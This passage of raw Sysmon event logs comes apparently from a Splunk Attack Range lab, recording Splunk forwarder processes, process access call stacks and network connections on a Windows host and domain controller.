Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980988Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.950{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D52-6151-0F7A-00000000FD01}2812C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980987Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.935{69CF5F33-8D52-6151-0F7A-00000000FD01}2812C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980986Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.544{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD41DF6CD53619C666D55A1850440C17,SHA256=FA4087FEDBBFAC30564426E9FE2122BD4BD8FD34342FEAA8512E7458651884E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980985Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.419{69CF5F33-8D52-6151-0E7A-00000000FD01}4028340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980984Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.263{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D52-6151-0E7A-00000000FD01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980983Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980982Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980981Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980980Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980979Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980978Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980977Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980976Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980975Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.263{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980974Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.247{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8D52-6151-0E7A-00000000FD01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980973Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.247{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D52-6151-0E7A-00000000FD01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980972Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.249{69CF5F33-8D52-6151-0E7A-00000000FD01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980971Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.060{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2E8A1B18617555F93F153D722188A1A,SHA256=16894E9F1EC8E726A9663CCEC6DDB535FAA508E16CF9DF6622D8B5B70EB3C783,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980970Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:22.760{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59524-false10.0.1.12-8000- 354300x80000000000000001056237Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:26.176{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com36882-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056236Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:27.670{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75727B07DB3CC092B3474D37FE91E3E0,SHA256=7AE78C7AF40F589C1A5B1A0805555828E0EC2631AEB418707CCDA58B6061AC0F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981015Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.872{69CF5F33-8D53-6151-107A-00000000FD01}38283324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981014Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.638{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D53-6151-107A-00000000FD01}3828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981013Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.638{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981012Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.638{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981011Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.638{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981010Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.638{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981009Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.638{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981008Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.638{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.